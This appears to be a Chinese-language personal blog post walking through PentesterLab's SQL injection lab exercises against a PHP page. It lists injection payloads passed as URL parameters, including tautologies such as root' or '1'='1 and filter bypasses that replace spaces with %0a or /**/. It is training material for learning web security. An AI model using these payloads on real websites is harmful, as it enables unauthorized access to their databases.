Attack 目標網站如下圖所示。由此頁面可發現 :

項目 資訊
program language PHP
Input $_GET['name']

 


Example 1

第一個練習較為簡單,網站並無進行任何驗證。 

可以推估是使用最單純的實作方式。   "SECECT * FROM TABLE_NAME where name = '  $_GET["name"]   '"   

?name=root' or '1'='1

 

Example 2

此題目經過處理後當URL有空白時,回應「ERROR NO SPACE」,避免攻擊者組成sql語法,然而此種方式可以透過添加「\t」進入語法之中,繞過驗證。

?name=root'%0aor%0a'1'='1

 

 

 

 

Example 3

example 3

?name=root'/**/or/**/'1'='1

 

 

 

Example 4

example 4

?id=1 or 1=1

 

 

 

 

Example 5

example 5

?id=1 or 1=1

 

Example 6

 

?id=1 or 1=1

 

 

 

 

Example 7

example 7

?id=2%0aor%0a1=1

 

?id=2%0A or 1 = 1

 

 

Example 8

不明白題目用意。

 

 

 

Example 9

不明白題目用意。

 

arrow
arrow
    文章標籤
    PentesterLab SQL injections
    全站熱搜
    創作者介紹
    創作者 Lung-Yu,Tsai 的頭像
    Lung-Yu,Tsai

    Lung-Yu,Tsai 的部落格

    Lung-Yu,Tsai 發表在 痞客邦 留言(0) 人氣()